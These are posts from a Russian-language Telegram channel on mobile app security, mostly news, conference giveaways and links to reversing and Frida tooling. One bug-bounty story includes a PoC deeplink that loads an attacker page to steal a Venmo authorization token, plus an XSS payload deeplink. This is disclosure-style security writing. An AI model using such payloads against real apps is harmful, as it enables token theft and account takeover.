Новости мобильной безопасности

С небольшим опозданием, но все-таки они вышли - подборка новостей по мобильной безопасности, выпуск №6 😎

https://habr.com/ru/company/swordfish_security/news/t/668720/

Ало! Мы ищем таланты!

Всем привет!
Друзья, открыт CFP на OFFZONE!
И честно говоря, мне бы очень хотелось, чтобы в этом году было побольше докладов про мобильные приложения. Про баги, про тулы, про инструменты анализа, про сложности и просто веселые истории или хардкорные доклады.
Если у вас есть идея для доклада, присылайте смело! Не стоит думать, что это никому не интересно и только поэтому молчать :)

Приходите!

Объявляем Call for Papers для OFFZONE 2022!

Почитать о подаче заявок, принципах CFP и бонусах для спикеров можно на сайте. Если коротко:

▪️Заявку можно подать до 3 июля.
▪️Будет два формата выступлений — Talk и Short Talk.
▪️Подавать заявку нужно лично. Нет, через пиарщика нельзя.
▪️Приложить к докладу можно любые материалы. Да, даже фото котиков, если они помогут оценить качество исследования.

До встречи👋

Определение «зловредности» приложения.

Попался на глаза интересный репозиторий, который используя специально обученную ML-модель определяет, является ли Android-приложение malware и с какой вероятностью.

Сеть натренирована на репозитории, в котором представлена куча всяких зловредов под Android (около 300 штук), на любой вкус. Можно самому посмотреть, как какой из них работает.

Интересно попробовать свои приложения в него позагружать и посмотреть, какие из них он посчитает вредоносом.

#Android #malware

Уязвимости в предустановленных приложениях

А ещё и во фреймворке компании “mce Systems” были найдены исследователями Майкрософт (как-то их research-команда мимо меня проходила, не знал, что они анализируют что-то кроме себя самих).

Вообще статья достаточно неплоха, и баги интересные (выполнение кода, инжект JS, повышение привилегий через десериализацию). Описаны тоже неплохо, даже иногда с советами, как можно этого избежать.

В общем, можно глянуть и если вам на проверку пришло приложение, с похожей библиотекой, вспомните про этот пост и проверьте, нужную ли версию они юзают 😁

P.S. В статье первый раз увидел упоминание PiTM (Person in the Middle), сначала задумался и даже загуглил, что это за разновидность такая атаки)))))

#microsoft #android #vuln #research #pitm

Полезный Frida-tool для iOS/Android

Достаточно интересный репозиторий для анализа iOS-приложений, который представляет из себя обвязку над несколькими функциями фриды и умеет делать еще несколько полезных вещей:
- дамп расшифрованного ipa
- логи с устройства
- отключение проверки на jailbreak/pinning
- получение дампа памяти с приложения

И ещё много полезных вещей, которыми можно управлять из единого места. Написано на питоне, так что без труда можно модифицировать под себя.

Рядом лежит второй похожий репо этого же автора, только для Android. Тот же самый функционал с набором разных скриптов под frida. Можно интересное посмотреть что-то.

И последний репозиторий от этого же автора, с большим количеством видео и примерами по использованию - перехват зашифрованного трафика для некоторых приложений, которые дополнительно делают что-то с данными при передаче их на сервер.

Кстати, видео-уроки/демо по работе с этими инструментами есть у автора на Youtube, так что можно вживую посмотреть, как эти инструменты работают.

Вообще, выглядят эти тулы достаточно интересно и перспективно.

#ios #frida #frida-ios-hook #Android

Уязвимость в UNISOC

Хорошая статья, правда не про приложения, а про мобильные устройства и их хардварную часть.

Уязвимость в чипсете UNISOC, которая позволяет, по факту, полностью отключить человека от мобильной сети.

Статья интересна техническим описанием протоколов и различными схемами коммуникации, многочисленными отсылками к документации и спецификациям. В общем, для лучшего понимания, как наши устройства работают - самое то!

Хорошего чтения!

#unisoc #vulnerability #dos

Внимание, розыгрыш билета на OFFZone 2022!

Всем привет!

Как вы знаете, скоро будет проходить очень крутая конференция по безопасности - OFFZone 2022, которая пройдёт в Москве 25-26 августа!

И, так как я принимаю в ней небольшое участие, я хотел бы разыграть проходку на это замечательное мероприятие.

Вообще, проходок и конкурсов будет несколько, это только первый из них! Один будет творческим, второй более техническим.

Итак, суть конкурса простая, у каждого из нас есть история (или даже несколько) о самых прикольных, интересных, сложных или тупых уязвимостей, которые находились в мобильных приложениях. А может вы и сами когда-либо допускали такие ошибки?)

Расскажите об этом, как вы их искали, почему это запомнилось, что понравилось, может, даже написали статью или пост про это.

В общем любые веселые, хардкорные или интересные находки!

Писать можно в комментариях к этому посту или в наш чат c тегом #offzone1

В конце, как наберется достаточно историй (скажем, через 2 недели), я выберу ту историю, что понравилась больше всего и отдам бесплатную проходку на конференцию!

Думаю, что каждый из нас может вспомнить что-то интересное, давайте немного поностальгируем и повеселимся!

#offzone #offzone2022 #конкурс

Внимание, розыгрыш билета на Mobius!

Друзья, так как в нашем чате не только безопасники и хацкеры, но и разработчики, вашему вниманию предлагается конкурс/розыгрыш билета на оффлайн день конференции Mobius, которая пройдет чуть меньше чем через две недели в Санкт-Петербурге.

Предыдущий конкурс был про рассказ о самых запоминающихся уязвимостях, которые были найдены. Но с другой стороны, не всегда получается что-то поломать и все мы писали какие-то странные вещи в отчетах по тестированию (особенно, когда ничего не нашлось, а написать что-то надо).

Суть конкурса, которая подойдет и разработчикам и безопасникам:
Напишите в комментариях к этому посту или в нашем чате историю про самую дикую дичь, которую вы видели в отчете пентеста по мобильным приложениям. А может вы и сами такое писали когда-то?

К сообщению прикрепите тэг #mobius, чтобы я потом смог найти это в комментариях и выбрать победителя.


Ну что, посмотрим, у кого истории будут интереснее, у людей, которые ищут уязвимости или которые читают наши отчеты 😃

P.S. Так как конференция уже скоро и нужно планировать, этот конкурс продлится до среды (15 июня).

Не стесняйтесь, мы готовы к любым историям

Поехали!

#конкурс #mobius #story

Немного пятничной ностальгии

А тем временем прошло уже два года с момента создания канала! Даже немного не верится, что столько времени мне удаётся его не забрасывать :D

Спасибо, что читаете, общаетесь и создаете ту атмосферу, ради которой всё это и затевалось (в том числе)!

Я постараюсь радовать вас и в следующем году жизни хорошими материалами, конкурсами и чем-то ещё веселым))

На этой отличной новости желаю вам хороших и плодотворных длинных выходных!

🎉🎉🎉

И не забывайте писать истории, разыгрываем два билета, на оффзон и на мобиус :)

#пятница

Реверс iOS-приложений для начинающих

Отличная статья по реверсу и модификации iOS-приложений доя начинающих!

Никаких больших и тяжелых софтин, вроде IDA, дизассемблеров и прочего, только классика: otool, cycript и lldb.

Очень рекомендую всем, кто желает попробовать свои силы и начать погружаться в тему безопасности iOS. В качестве тренировки автором написано простое приложение, на котором и предлагается попробовать свои силы. Также может подойти в дальнейшем для какого-то простенького ctf или задачки на собесе :))

В общем, приятного чтения!

#ios #disassemble #lldb

Результаты розыгрыша билета на Mobius

Всем привет, как и обещал, подведем итоги конкурса!
Есть две новости, хорошая и плохая)

Плохая в том, что активных участников конкурса было не сильно много, всего несколько человек. Но ничего, думаю в следующий раз будет побольше))

А хорошая в том, что выбирать мне не придется, так как организаторы решили нас поддержать и оба участника, благодаря свои историям попадают на конференцию Mobius!

@impact_l и @artebels спасибо вам за ваши истории и поздравляю!

Скоро с вами свяжется организатор и вручит билетик 😉

Если захочется подробнее посмотреть, что ждет на конференции, то программа полностью готова и доступна на сайте конференции.

Если решили посетить конфу, то не забывайте про промокод (он действует на персональный билет, вкладка «для частных лиц» на сайте): maw2022JRGpc

🍻🍻🍻

Malware под iOS, мимикрирующая под криптокошельки

Прочитал интересную статью, посвященную разбору и анализу вредоноса под iOS, целью которого являются различные криптокошельки пользователей.

Если говорить про Android, то тут всё достаточно просто, различного вида и модификаций зловредов там огромное количество, чего не скажешь про iOS. Основная проблема тут это сложность установки приложений не из магазина и полная зависимость от Apple в этом плане.

Как же действовали в этом конкретном случае? Насколько я понял, брали оригинальное приложение, модифицировали его, добавляли библиотеку .dylib, паковали, подписывали своим Apple provisioning profile и выкладывали на фейковые домены, которые мимикрировали под оригинальные сайты криптобирж и кошельков.

Ну а далее - заманивали на сайты, люди скачивали приложение, нажимали «доверять» и пошло поехало!

В статье описаны технические подробности всего вышеперечисленного, с детальным описанием, очень рекомендую почитать и посмотреть, нечасто такое встретишь)

#ios #backdoor #crypto

Встретимся на OFFZone!

Друзья, всех, кто интересуется практическими аспектами обеспечения информационной безопасности, приглашаю принять участие и встретиться лично на конференции Offzone 2022, которая пройдет 25 и 26 августа в Москве!

Ну а чтобы точно туда попасть, не забывайте участвовать в розыгрыше билета и следить за новостями, впереди ещё один конкурс :)

И ещё, рад сообщить, что наш канал Mobile Appsec World был приглашен стать одним из коммьюнити партнеров конференции Offzone 2022. У нас не только будет отдельный тематический стенд, но и специальные активности и конкурсы с крутыми призами. Проведем CTF, посканим приложения, пообщаемся в конце-концов!

Обещаем много насыщенного и полезного контента по теме мобильной безопасности!

Подключайтесь! 😎

#offzone #ofzone2022 #stand #community

Ну и веселую картиночку любителям неона =)

Итоги первого конкурса по Offzone

Всем привет!
Прошло уже достаточно времени, как стартовал конкурс, истории перестали приходить и пора бы подвести итоги.

Спасибо всем, кто участвовал, истории были классные и добавили немного веселья в наш чат :)

Но я просто не могу не отдать проходку @impact_l за его шикарную историю! Те, кто не читал, отправлю её следующим постом. Я думаю все согласятся, что это достойно награды!

@impact_l поздравляю!

Ну а всех, кто отправил свои истории, жду на стенде оффзона за мерчем :)

Впереди ещё пара конкурсов, не переживайте те, у кого ещё нет билетов ;)

#offzone #конкурс

#offzone1 Наливайте чай, устраивайтесь поудобнее. Расскажу вам сказ, о том как нашёл уязвимость в мобильном приложении от PayPal https://hackerone.com/paypal?type=team
А именно речь пойдёт об их активе com.venmo
В одно прекрасное утро, как обычно, решил закинуть apk в jadx, чтобы найти уязвимость.

Просматривая строки кода, один класс, второй... Ничего интересного. Тут уж я расстроился, думал перейти к следующему активу, но мой глаз зацепился за класс webview.
Да-да, там была интересная функция которая автоматически присваивала AuthorizationToken при загрузке страницы в WebView.
Естественно можно было отправить url прямо в класс через deeplink venmo://webview?url=https://www.google.com/

Вот только там была проверка хоста.
— Возможно она реализована неверно. Подумал я вслух.

А код проверки был следующим:

public static boolean isSecureVenmoHostUrl(Uri uri) {
        boolean z = false;
        if (uri == null) {
            return false;
        }
        String host = uri.getHost();
        String scheme = uri.getScheme();
        if (host != null && scheme != null 
&& scheme.equalsIgnoreCase(BuildConfig.SCHEME) 
&& (host.endsWith(".venmo.com") || host.equals("venmo.com") || host.endsWith("venmo.biz"))) 
{
            z = true;
        }
        return z;
    }

Вам даётся 5 секунд, на то чтобы найти ошибку.
5
4
Верно, здесь забыли добавить точку host.endsWith("venmo.biz")

Недолго думая, я решил организовать PoC и проверить: <a href="venmo://webview?url=https://fakevenmo.biz/theft.html">PoC Intent Send</a>
К моему удивлению, url был успешно загружен и мне удалось украсть Authorization токен.
Радостный (конечно, ведь баунти 10к$) начал писать отчёт на hackerone. Потирая руки, приговаривая:
— Триагер приди, триагер приди

Триагер пришёл. Поставил Triage. Ура!
А потом поменял на Duplicate. Указав что у них уже есть отчёт с этой ошибкой 401940 . Моему негодованию не было предела. Чтож поздравляю @bagipro хорошо поймал!

Естественно, я следил за дальнейшими обновлениями приложения. И к моему счастью (конечно, ведь баунти 10к$), обнаружил что отчёт #401940 помечен как resolved, а ошибка всё ещё осталась в приложении!

Быстро сев за клавиатуру, я начал пилить репорт. На следующий день триагер ставит мне дубликат. Как же так?
Поставив ультиматум с просьбой добавить меня в отчёт — Закинули сюда #450832. Чтож поздравляю @bagipro хорошо поймал (снова)!

Я пытался оспорить решение о том, что мой отчёт — дубликат, ведь мой отчёт был отправлен раньше #450832. Но триагеры были неумолимы. В итоге, смирившись, оставил эту затею.

Спустя год или два. PayPal наконец-то исправили приложение. Внеся невероятный Fix: host.endsWith(".venmo.biz")
Верно, они добавили точку.
— Теперь пользователи PayPal в безопасности. Сказал вслух, закатывая глаза.

Однако, они по прежнему присваивают AuthorizationToken при загрузке url в webview. Нужно запомнить это знание.

Спустя два года, в мои цепкие лапы попала xss на поддомене .venmo.com
Недолго думая, составил deeplink venmo://webview?url=https://legal.venmo.com/index.php?p=<script>alert()<script>
Успешно применив знание, я отправил отчёт в PayPal, и заполучил заслуженный reward.

Не знаю, грустная эта история или весёлая. По крайней мере она мне кажется немного поучительной

P.S. история является реальной, все совпадения не случайны

Инструмент для загрузки приложений из систем дистрибуции и магазинов приложений

Всем привет!

Очень часто возникает необходимость загрузить что-то из Google Play или Apple Appstore.
А бывает и такое, что нужно автоматизировать загрузку промежуточных версий из какого-то Firebase, например или AppCenter.

Мы тоже сталкиваемся постоянно с этими задачами, поэтому решили их автоматизировать и оформить в виде репо на гитхаб, а также питоновского пакета и докер-образа :)

Вообще, это наш cli для автоматического сканирования приложений, но если вам нужно просто приложение, достаточно указать флаг —download_only

И если интересно почитать, как мы это разрабатывали - прошу на Хабр!

Пользуйтесь на здоровье :)

#habr #integratios #firebase #googleplay #appstore

Начало цикла статей по Android Internals

Всем привет! Нашел достаточно познавательную статью о внутреннем устройстве Android. Название многообещающее - Android Internals for Reverse Engineers.

В первой (и пока что единственной главе) описываются базовые понятие из мира Android, что такое Dalvik Bytecode, как он выполняется, из чего состоит и т.д.

Вообще, автор анонсировал дальнейшее продолжение и я его жду, потому что материал, его подача и контент читаются достаточно легко, понятно и информативно. Конечно, пока что ничего сильного нового, но освежить знания никогда не поздно)

Так что читаем и ждем (надеемся) на продолжение!

#android #internals #dalvik

Отличная заметка по реверсу и замене функции на свою в рантайме

В соседнем чате не так давно обсуждали различные возможности по предварительной загрузке или подмене системных библиотек при старте Android и промелькнуло несколько интересных ссылок на статьи.

И вот первая из них, как раз про подмену функций в рантайме, анализ логики работы, работа со смещениями, lldb и другим не менее интересным тулом для дизассемблирования ARMv8 инструкций в runtime - armadillo.

Самое главное, статья от нашего соотечественника на родном, русском языке! Отличный материал, очень подробное повествование, с примерами и результатом в виде готового проекта - hijack-shared-library-function.

В общем, спасибо большое автору @x25519 за годный контент!

#lldb #reverse

Исследование Android Auto

И ещё серия статей от предыдущего автора @x25519, но на этот раз уже про Android Auto.

На самом деле я никогда даже не задумывался, как это всё работает под капотом, как реализована интеграция и какие протоколы используются при подключении телефона к машине. А ведь это целый новый дивный мир!

Хотел бы представить вашему внимаю две крайне интересные статьи:
- Android Auto on Real Android статья про андроид авто, его эмуляцию, работу с ним по USB и много-много других интересных вещей про работу с ним

- TLS 1.2 brief insight - статья, описывающая принцип работы tls, очень качественно и подробно, а также способ дампа ключей, использующихся при установке соединения, а так же репозиторий для расшифровки этого трафика и логирования ключей

Очень советую прочитать все эти материалы, так как они действительно очень крутые и полезные 😄

Спасибо и всем хорошего дня :)

#androidauto #tls #android